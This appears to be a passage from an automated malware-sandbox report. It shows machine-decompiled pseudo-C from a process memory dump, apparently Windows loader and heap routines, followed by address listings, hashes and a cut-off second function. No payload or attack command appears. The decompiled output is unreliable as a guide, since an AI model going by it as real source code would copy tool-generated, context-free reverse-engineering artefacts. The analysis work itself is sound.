					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x16c7b9c; // 0x0
							_t281 = L015F4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0161F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x16c7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x16c7b8c; // 0x1172b18
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E015F2280(_t200, 0x16c84d8);
									_t277 =  *0x16c85f4; // 0x1173008
									_t351 =  *0x16c85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1172fa0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E015EFFB0(_t287, _t353, 0x16c84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0162CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E015E6600(0x16c52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E015E7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x16cb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0165E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x16c8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x16cb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x16cb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E015F2280(_t250, 0x16c84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01613898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E015EFFB0(_t293, _t353, 0x16c84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E016137F5(_t353, 0);
																}
																E01610413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01609B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E016002D6(_t174);
																}
																L015F77F0( *0x16c7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0160C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L015EEC7F(_t353);
										L016019B8(_t287, 0, _t353, 0);
										_t200 = E015DF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x16cb2f8 |  *0x16cb2fc) == 0 || ( *0x16cb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0161B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x16cb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01686B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01686AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E015EE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L015EEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01619730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E015EE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L015E8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01613C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x015ed5f2
0x015ed5f5
0x015ed5f5
0x015ed5fd
0x015ed600
0x015ed60a
0x015ed60d
0x015ed617
0x015ed61d
0x015ed627
0x015ed62e
0x015ed911
0x015ed913
0x00000000
0x015ed919
0x015ed919
0x015ed919
0x015ed634
0x015ed634
0x015ed634
0x015ed634
0x015ed640
0x015ed8bf
0x00000000
0x015ed646
0x015ed646
0x015ed64d
0x015ed652
0x0163b2fc
0x0163b2fc
0x0163b302
0x0163b33b
0x0163b341
0x00000000
0x0163b304
0x0163b304
0x0163b319
0x0163b31e
0x0163b324
0x0163b326
0x0163b332
0x0163b347
0x0163b34c
0x0163b351
0x0163b35a
0x00000000
0x0163b328
0x0163b328
0x00000000
0x0163b328
0x0163b326
0x015ed658
0x015ed658
0x015ed65b
0x015ed665
0x00000000
0x015ed66b
0x015ed66b
0x015ed66b
0x015ed66b
0x015ed66d
0x015ed672
0x015ed67a
0x00000000
0x00000000
0x015ed680
0x015ed686
0x015ed8ce
0x015ed8d4
0x015ed8dd
0x015ed8e0
0x015ed68c
0x015ed691
0x015ed69d
0x015ed6a2
0x015ed6a7
0x015ed6b0
0x015ed6b5
0x015ed6e0
0x015ed6b7
0x015ed6b7
0x015ed6b9
0x015ed6b9
0x015ed6bb
0x015ed6bd
0x015ed6ce
0x015ed6d0
0x015ed6d2
0x0163b363
0x0163b365
0x00000000
0x0163b36b
0x00000000
0x0163b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x015ed6bf
0x015ed6bf
0x015ed6e5
0x015ed6e7
0x015ed6e9
0x015ed6ec
0x015ed6ec
0x015ed6ef
0x015ed6f5
0x015ed6f9
0x015ed6fb
0x015ed6fd
0x015ed701
0x015ed703
0x015ed70a
0x015ed70a
0x015ed701
0x015ed710
0x015ed710
0x015ed6c1
0x015ed6c1
0x015ed6c6
0x0163b36d
0x0163b36f
0x00000000
0x0163b375
0x0163b375
0x0163b375
0x00000000
0x0163b375
0x00000000
0x015ed6cc
0x015ed6d8
0x015ed6d8
0x015ed6d8
0x00000000
0x015ed6c6
0x015ed6bf
0x00000000
0x015ed6da
0x015ed6da
0x015ed716
0x015ed71b
0x015ed720
0x015ed726
0x015ed726
0x015ed72d
0x00000000
0x015ed733
0x015ed739
0x015ed742
0x015ed750
0x015ed758
0x015ed764
0x015ed776
0x015ed77a
0x015ed783
0x015ed928
0x015ed92c
0x015ed93d
0x015ed944
0x015ed94f
0x015ed954
0x015ed956
0x015ed95f
0x015ed961
0x015ed973
0x015ed973
0x015ed956
0x015ed944
0x015ed92c
0x015ed78b
0x0163b394
0x015ed791
0x015ed798
0x0163b3a3
0x0163b3bb
0x0163b3bb
0x015ed7a5
0x015ed866
0x015ed870
0x015ed892
0x015ed898
0x015ed89e
0x015ed8a0
0x015ed8a6
0x015ed8ac
0x015ed8ae
0x015ed8b4
0x015ed8b4
0x015ed8ae
0x015ed7a5
0x015ed78b
0x015ed7b1
0x0163b3c5
0x0163b3c5
0x015ed7c3
0x015ed7ca
0x015ed7e5
0x015ed7eb
0x015ed8eb
0x015ed8ed
0x00000000
0x015ed8f3
0x015ed8f3
0x015ed8f3
0x00000000
0x015ed8ed
0x015ed7cc
0x015ed7cc
0x015ed7d2
0x00000000
0x015ed7d4
0x015ed7d4
0x015ed7d7
0x015ed7df
0x0163b3d4
0x0163b3d9
0x0163b3dc
0x0163b3dc
0x0163b3df
0x0163b3e2
0x0163b468
0x0163b46d
0x0163b46f
0x0163b46f
0x0163b475
0x015ed8f8
0x015ed8f9
0x015ed8fd
0x0163b3e8
0x0163b3e8
0x0163b3eb
0x0163b3ed
0x00000000
0x0163b3ef
0x0163b3ef
0x0163b3f1
0x0163b3f4
0x0163b3fe
0x0163b404
0x0163b409
0x0163b40e
0x0163b410
0x0163b410
0x0163b414
0x0163b414
0x0163b41b
0x0163b420
0x0163b423
0x0163b425
0x0163b427
0x0163b42a
0x0163b42d
0x0163b42d
0x0163b42a
0x0163b432
0x0163b436
0x0163b438
0x0163b43b
0x0163b43b
0x0163b449
0x0163b44e
0x0163b454
0x0163b458
0x0163b458
0x0163b45d
0x00000000
0x0163b45d
0x0163b3ed
0x00000000
0x00000000
0x00000000
0x015ed7df
0x015ed7d2
0x015ed7ca
0x0163b37c
0x0163b37e
0x0163b385
0x0163b38a
0x00000000
0x0163b38a
0x015ed742
0x015ed7f1
0x015ed7f8
0x0163b49b
0x0163b49b
0x015ed800
0x015ed837
0x015ed843
0x015ed845
0x015ed847
0x015ed84a
0x015ed84b
0x015ed84e
0x015ed857
0x015ed818
0x015ed824
0x015ed831
0x0163b4a5
0x0163b4ab
0x0163b4b3
0x0163b4b8
0x0163b4bb
0x00000000
0x0163b4c1
0x0163b4c1
0x0163b4c8
0x00000000
0x0163b4ce
0x0163b4d4
0x0163b4e1
0x0163b4e3
0x0163b4e5
0x00000000
0x0163b4eb
0x0163b4f0
0x0163b4f2
0x015edac9
0x015edacc
0x015edacf
0x015edad1
0x015edd78
0x015edd78
0x015edcf2
0x00000000
0x015edad7
0x015edad9
0x015edadb
0x00000000
0x00000000
0x015edae1
0x015edae1
0x015edae4
0x015edae6
0x0163b4f9
0x0163b4f9
0x0163b500
0x015edaec
0x015edaec
0x015edaf5
0x015edaf8
0x015edafb
0x015edb03
0x015edb11
0x015edb16
0x015edb19
0x015edb1b
0x0163b52c
0x0163b531
0x0163b534
0x015edb21
0x015edb21
0x015edb24
0x015edcd9
0x015edce2
0x015edce5
0x015edd6a
0x015edd6d
0x00000000
0x015edd73
0x0163b51a
0x0163b51c
0x0163b51f
0x0163b524
0x00000000
0x0163b524
0x015edce7
0x015edce7
0x015edce7
0x00000000
0x015edce7
0x00000000
0x015edb2a
0x015edb2c
0x015edb31
0x015edb33
0x015edb36
0x015edb39
0x015edb3b
0x015edb66
0x015edb66
0x015edb3d
0x015edb3d
0x015edb3e
0x015edb46
0x015edb47
0x015edb49
0x015edb4c
0x015edb53
0x015edb55
0x015edb58
0x015edb5a
0x0163b50a
0x0163b50f
0x0163b512
0x015edb60
0x015edb60
0x015edb63
0x015edb63
0x00000000
0x015edb63
0x015edb5a
0x015edb3b
0x015edb24
0x015edb69
0x015edb69
0x015edb6c
0x015edb6f
0x015edb74
0x0163b557
0x0163b557
0x0163b55e
0x015edb7a
0x015edb7c
0x015edb7f
0x015edb82
0x015edb85
0x00000000
0x015edb8b
0x015edb8b
0x015edb8d
0x015edb9b
0x015edb9b
0x015edb9d
0x015edba0
0x015edba2
0x015edba4
0x015edba7
0x015edba9
0x015edbae
0x015edbae
0x015edbb1
0x015edbb4
0x015edbb4
0x015edbb7
0x015edbba
0x015edcd2
0x015edcd4
0x00000000
0x015edbc0
0x015edbc0
0x015edbd2
0x015edbd7
0x015edbda
0x015edbdd
0x015edbdf
0x00000000
0x015edbe5
0x015edbe5
0x015edbee
0x015edbf1
0x0163b541
0x0163b544
0x00000000
0x0163b546
0x0163b546
0x00000000
0x0163b546
0x015edbf7
0x015edbf7
0x015edbfd
0x015edbfd
0x015edbff
0x015edc0b
0x015edc15
0x015edc1b
0x015edc1d
0x015edc21
0x015edc21
0x015edc23
0x015edc23
0x015edc26
0x015edc29
0x015edc2b
0x00000000
0x00000000
0x015edc31
0x015edc34
0x015edc36
0x015edcbf
0x015edcbf
0x015edcc2
0x00000000
0x015edc3c
0x015edc41
0x015edc43
0x00000000
0x015edc45
0x015edc45
0x015edc47
0x00000000
0x015edc4d
0x015edc4d
0x015edc50
0x015edc52
0x015edc55
0x015edcfa
0x015edcfe
0x015edd08
0x015edd0a
0x015edd0c
0x00000000
0x015edd12
0x015edd15
0x015edd2d
0x015edd2f
0x015edd32
0x015edd35
0x00000000
0x015edd35
0x015edc5b
0x015edc5b
0x015edc5e
0x015edc61
0x015edc64
0x015edc67
0x015edc67
0x015edc6a
0x015edc6c
0x015edc8e
0x015edc8e
0x015edc91
0x015edc93
0x015edcce
0x015edcce
0x015edc95
0x015edc9c
0x015edc6e
0x015edc72
0x015edc75
0x015edc77
0x015edc79
0x0163b551
0x0163b551
0x00000000
0x015edc7f
0x015edc7f
0x015edc81
0x00000000
0x015edc83
0x015edc86
0x015edc88
0x00000000
0x00000000
0x00000000
0x00000000
0x015edc88
0x015edc81
0x015edc79
0x015edc6c
0x015edc55
0x015edc47
0x015edc43
0x00000000
0x015edc36
0x015edc23
0x00000000
0x015edbff
0x015edbf1
0x015edbdf
0x015edb8f
0x015edb92
0x015edb95
0x00000000
0x00000000
0x00000000
0x00000000
0x015edb95
0x015edb8d
0x015edb85
0x015edb74
0x015edc9f
0x015edca2
0x015edcb0
0x015edcb0
0x015edad1
0x0163b4e5
0x0163b4c8
0x00000000
0x00000000
0x00000000
0x015ed831
0x00000000
0x015ed800
0x0163b47f
0x0163b485
0x00000000
0x0163b485
0x015ed665
0x015ed652
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151aeb11ef117296874e54ded1184afd1d6da6ef3ef490e2b5a80958d2f83389
Instruction ID: 4a6dd4903717924ae8a49928a931d869bbe5d81d909358dbcb663fcb24ef19fd
Opcode Fuzzy Hash: 151aeb11ef117296874e54ded1184afd1d6da6ef3ef490e2b5a80958d2f83389
Instruction Fuzzy Hash: 43E19E30E0526A8FEB399F68CC88B7DBBF6BF85304F044199D9099B291D774A981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 015FB236, Relevance: .3, Instructions: 305
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E015FB236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E015FB477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = E0167CB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E01600678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E01619660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E01619660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E01619660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E0160174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E0160138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E015F7D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										E0169138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E015F7D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01691582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E015F7D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E015F7D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									E01691582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E015F7D50();
								__eflags = _t129;
								if(_t129 != 0) {
